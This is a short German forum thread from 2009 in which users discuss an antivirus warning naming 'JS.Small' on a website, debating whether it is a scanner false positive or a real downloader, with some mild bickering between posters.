Ich glaube, sollte tatsächlich was in der Richtung ausgeliefert werden, dass keinerlei Absicht bzw. bewusstes Einbinden durch den Anbieter dahinter steckt. Wie gesagt, die Prüfung läuft bereits - ich habe den Verdacht auf Signaturf*ck*ps der Virenscanner. Ist ja nichts neues, dass Scripte mit "ähnlichen" Codebereichen wie der "Virus" als schon bekannter Schadcode fälschlich identifiziert werden. Aber selbst dann, würde ich gern wissen, was das auslöst.


----------



## thehed (3. Oktober 2009)

skyline930 schrieb:


> "JS.Small" ist eine Bezeichunung für einen Downloader, der Lücken in eurem System ausnutzt. Wie du siehst, ist die Seite nicht von Buffed, sondern eine Seite von ner Werbung oder so.. Wenn du dein FireFox oder was auch immer, und dein Windows brav updatest, kann das Ding ganz genau .. nichts (!) machen. Wenn du das nicht tust, dann selber schuld.



Hab ich was anderes behauptet? Nein es war nur eine simple Meldung. Wieso postest du sowas, ist deine Berufung durch Foren ziehen und Leute anzumachen?
Schulferien!


----------

